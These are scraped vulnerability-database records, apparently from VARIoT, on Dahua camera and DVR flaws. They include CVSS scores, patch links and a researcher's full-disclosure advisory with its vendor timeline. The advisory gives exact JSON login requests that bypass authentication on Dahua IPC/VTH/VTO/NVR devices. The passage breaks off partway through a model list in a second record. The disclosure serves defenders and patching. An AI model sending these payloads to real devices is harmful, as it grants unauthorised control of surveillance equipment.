"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2021-33045",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2021-103420",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.6,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 4.9,
"id": "CNVD-2021-70815",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2021-33045",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2021-33045",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2021-103420",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2021-70815",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202109-1081",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-103420"
},
{
"db": "CNVD",
"id": "CNVD-2021-70815"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012414"
},
{
"db": "NVD",
"id": "CVE-2021-33045"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1081"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. plural Dahua The product contains authentication vulnerabilities.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Dahua IPC is a series of industrial computer from Dahua of China Dahua Company. Zhejiang Dahua Technology Co., Ltd. is a leading monitoring product supplier and solution service provider. [STX]\n\nSubject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045)\n\nAttack vector: Remote\nAuthentication: Anonymous (no credentials needed)\nResearcher: bashis \u003cmcw noemail eu\u003e (2021)\nLimited Disclosure: September 6, 2021\nFull Disclosure: October 6, 2021\nPoC: https://github.com/mcw0/DahuaConsole\n\n-=[Dahua]=-\nAdvisory: https://www.dahuasecurity.com/support/cybersecurity/details/957\nFirmware: https://www.dahuasecurity.com/support/downloadCenter/firmware\n\n-=[Timeline]=-\nJune 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@dahuatech.com)\nJune 17, 2021: Sent reminder to Dahua PSIRT\nJune 18, 2021: Asked IPVM for help to get in contact with Dahua\nJune 18, 2021: Received ACK from IPVM, told they sent note to Dahua\nJune 19, 2021: ACK received from Dahua PSIRT, asked for additional details\nJune 19, 2021: Additional details including PoC sent\nJune 21, 2021: ACK received, vulnerabilites confirmed\nJune 23, 2021: Dahua PSIRT asked for \"coordinated disclosure\"\nJune 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now\nJune 24, 2021: Received CVE-2021-33044, I asked about the second CVE\nJuly 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for \"coordinated disclosure\"\nJuly 04, 2021: Confirmed \"coordinated disclosure\", once again\nJuly 05, 2021: Dahua PSIRT tried convince me for \"Full Disclosure\" for vendor only, and \"Limited Disclosure\" for outside world\nJuly 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before \"Limited Disclosure\" September 6, 2021. \n \"Full Disclosure\" will be October 6, 2021,\nAugust 30, 2021: Dahua PSIRT asked to read my \"Limited Disclosure\" note\nAugust 30, 2021: Sent my \"Limited Disclosure\" note\nSeptember 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates\nSeptember 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices\nSeptember 2, 2021: Dahua PSIRT pointed oversea website, asked for what models I have so Dahua could release firmware\nSeptember 2, 2021: Refused to provide details, as I do expect me to find firmware on their website\nSeptember 3, 2021: Dahua PSIRT informed that R\u0026D will upload updated firmware in batches\nSeptember 6, 2021: Limited Disclosure\nOctober 6, 2021: Full Disclosure\n\n\n-=[NetKeyboard Vulnerability]=-\n\nCVE-2021-33044\n\nVulnerability:\n \"clientType\": \"NetKeyboard\",\nVulnerable device types: IPC/VTH/VTO (tested)\nVulnerable Firmware: Those devices who do not support \"NetKeyboard\" functionality (older than June 2021)\nProtocol: DHIP and HTTP/HTTPS\n\nDetails:\nSetting above \"Vulnerability\" on \"Vulnerable device types\" during 1st or 2nd \"global.login\" sequence will simply bypass authentication. \n\nSuccessful bypass returns: {\"id\":1,\"params\":{\"keepAliveInterval\":60},\"result\":true,\"session\":\u003csessionID\u003e}\n\n[Example]\n{\n \"method\": \"global.login\",\n \"params\":\n {\n \"userName\": \"admin\",\n \"loginType\": \"Direct\",\n \"clientType\": \"NetKeyboard\",\n \"authorityType\": \"Default\",\n \"passwordType\": \"Default\",\n \"password\": \"Not Used\"\n },\n \"id\": 1,\n \"session\": 0\n}\n\n-=[Loopback Vulnerability]=-\n\nCVE-2021-33045\n\nVulnerability:\n \"ipAddr\": \"127.0.0.1\",\n \"loginType\": \"Loopback\",\n \"clientType\": \"Local\",\n\nVulnerable device types: IPC/VTH/VTO/NVR/DVR (tested)\nVulnerable Firmware: Firmware version older than beginning/mid 2020. \nProtocol: DHIP\n\nDetails:\nSetting above \"Vulnerability\" on \"Vulnerable device types\" during 1st or 2nd \"global.login\" sequence pretends that the login request comes from \"loopback\" and will therefore bypass legitimate authentication. \n\nSuccessful bypass returns: {\"id\":1,\"params\":{\"keepAliveInterval\":60},\"result\":true,\"session\":\u003csessionID\u003e}\n\n\n[Example]\nRandom MD5 with l/p: admin/admin\n{\n \"method\": \"global.login\",\n \"params\":\n {\n \"userName\": \"admin\",\n \"ipAddr\": \"127.0.0.1\",\n \"loginType\": \"Loopback\",\n \"clientType\": \"Local\",\n \"authorityType\": \"Default\",\n \"passwordType\": \"Default\",\n \"password\": \"[REDACTED]\"\n },\n \"id\": 1,\n \"session\": 0\n}\n\nPlain text with l/p: admin/admin\n{\n \"method\": \"global.login\",\n \"params\":\n {\n \"userName\": \"admin\",\n \"ipAddr\": \"127.0.0.1\",\n \"loginType\": \"Loopback\",\n \"clientType\": \"Local\",\n \"authorityType\": \"Default\",\n \"passwordType\": \"Plain\",\n \"password\": \"admin\"\n },\n \"id\": 1,\n \"session\": 0\n}\n\n[ETX]\n\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-33045"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012414"
},
{
"db": "CNVD",
"id": "CNVD-2021-103420"
},
{
"db": "CNVD",
"id": "CNVD-2021-70815"
},
{
"db": "PACKETSTORM",
"id": "164423"
}
],
"trust": 2.79
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-33045",
"trust": 4.6
},
{
"db": "PACKETSTORM",
"id": "164423",
"trust": 2.3
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012414",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-103420",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2021-70815",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1081",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-33045",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-103420"
},
{
"db": "CNVD",
"id": "CNVD-2021-70815"
},
{
"db": "VULMON",
"id": "CVE-2021-33045"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012414"
},
{
"db": "PACKETSTORM",
"id": "164423"
},
{
"db": "NVD",
"id": "CVE-2021-33045"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1081"
}
]
},
"id": "VAR-202109-1874",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-103420"
},
{
"db": "CNVD",
"id": "CNVD-2021-70815"
}
],
"trust": 2.2
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-103420"
},
{
"db": "CNVD",
"id": "CNVD-2021-70815"
}
]
},
"last_update_date": "2023-12-18T12:16:17.179000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "DHCC-SA-202106-001",
"trust": 0.8,
"url": "https://www.dahuasecurity.com/support/cybersecurity/details/957"
},
{
"title": "Patch for Dahua IPC Authentication Bypass Vulnerability (CNVD-2021-103420)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/311541"
},
{
"title": "Patch for Identity authentication bypass vulnerability in some Dahua products (CNVD-2021-70815)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/290746"
},
{
"title": "Dahua IPC Remediation measures for authorization problem vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=164676"
},
{
"title": "PoC",
"trust": 0.1,
"url": "https://github.com/mcw0/poc "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-103420"
},
{
"db": "CNVD",
"id": "CNVD-2021-70815"
},
{
"db": "VULMON",
"id": "CVE-2021-33045"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012414"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1081"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.0
},
{
"problemtype": "Inappropriate authentication (CWE-287) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-012414"
},
{
"db": "NVD",
"id": "CVE-2021-33045"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "http://packetstormsecurity.com/files/164423/dahua-authentication-bypass.html"
},
{
"trust": 2.4,
"url": "http://seclists.org/fulldisclosure/2021/oct/13"
},
{
"trust": 2.3,
"url": "https://www.dahuasecurity.com/support/cybersecurity/details/957"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33045"
},
{
"trust": 0.1,
"url": "https://github.com/mcw0/poc"
},
{
"trust": 0.1,
"url": "https://github.com/mcw0/dahuaconsole"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33044"
},
{
"trust": 0.1,
"url": "https://www.dahuasecurity.com/support/downloadcenter/firmware"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-103420"
},
{
"db": "CNVD",
"id": "CNVD-2021-70815"
},
{
"db": "VULMON",
"id": "CVE-2021-33045"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012414"
},
{
"db": "PACKETSTORM",
"id": "164423"
},
{
"db": "NVD",
"id": "CVE-2021-33045"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1081"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-103420"
},
{
"db": "CNVD",
"id": "CNVD-2021-70815"
},
{
"db": "VULMON",
"id": "CVE-2021-33045"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012414"
},
{
"db": "PACKETSTORM",
"id": "164423"
},
{
"db": "NVD",
"id": "CVE-2021-33045"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1081"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-12-30T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-103420"
},
{
"date": "2021-09-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-70815"
},
{
"date": "2022-08-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-012414"
},
{
"date": "2021-10-06T15:11:51",
"db": "PACKETSTORM",
"id": "164423"
},
{
"date": "2021-09-15T22:15:10.687000",
"db": "NVD",
"id": "CVE-2021-33045"
},
{
"date": "2021-09-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202109-1081"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-01-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-103420"
},
{
"date": "2021-09-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-70815"
},
{
"date": "2022-08-31T02:43:00",
"db": "JVNDB",
"id": "JVNDB-2021-012414"
},
{
"date": "2021-12-02T13:49:55.440000",
"db": "NVD",
"id": "CVE-2021-33045"
},
{
"date": "2021-10-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202109-1081"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202109-1081"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural \u00a0Dahua\u00a0 Product certification vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-012414"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202109-1081"
}
],
"trust": 0.6
}
}
VAR-201309-0168
Vulnerability from variot - Updated: 2023-12-18 12:09Dahua DVR appliances do not properly restrict UPnP requests, which makes it easier for remote attackers to obtain access via vectors involving a replay attack against the TELNET port. Digital video recorders (DVR) produced by Dahua Technology Co., Ltd. contain multiple vulnerabilities that could allow a remote attacker to gain privileged access to the devices. Dahua Security DVR Appliances accept UPnP requests from external untrusted devices, which can cause the telnet port of the DVR application device to be automatically redirected and accessed by external entities. These default conditions allow external attackers to detect the device and use the built-in account to authenticate. Access the device. An attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may aid in further attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201309-0168",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dvr2104c",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr2116hc",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr2116he",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr5204a",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr2108hc",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr2104hc",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr2108he",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr2116c",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr5216l",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr2108c",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr0404hf-al-e",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr3204hf-s",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr0404hf-s-e",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr0804hf-l-e",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr5404",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr0404hf-a-e",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr3224l",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr5116h",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr5116he",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr5808",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr0804hd-s",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr1604hf-s-e",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr0404hd-s",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr2104he",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr2108h",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr2404lf-s",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr6404lf-s",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr0404hd-a",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr0804hf-s-e",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr1604hd-l",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr5208a",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr3204lf-s",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr5108h",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr0804hf-al-e",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr1604hf-u-e",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr5108c",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr3204lf-al",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr2404hf-s",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr0804",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr2404lf-al",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr1604hd-s",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr5104he",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr5208l",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr0404hd-l",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr2104h",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr5108he",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr5216a",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr5816",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr0404hd-u",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr5104c",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr1604hf-l-e",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr5204l",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr5408",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr0804hf-a-e",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr0804hf-u-e",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr3232l",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr5804",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr1604hf-a-e",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr0804hd-l",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr5104h",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr0404hf-u-e",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr2116h",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr5416",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr5116c",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr1604hf-al-e",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dvr0404hd-a",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr0404hd-l",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr0404hd-s",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr0404hd-u",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr0404hf-a-e",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr0404hf-al-e",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr0404hf-s-e",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr0404hf-u-e",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr0804",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr0804hd-l",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr0804hd-s",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr0804hf-a-e",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr0804hf-al-e",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr0804hf-l-e",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr0804hf-s-e",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr0804hf-u-e",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr1604hd-l",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr1604hd-s",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr1604hf-a-e",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr1604hf-al-e",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr1604hf-l-e",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr1604hf-s-e",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
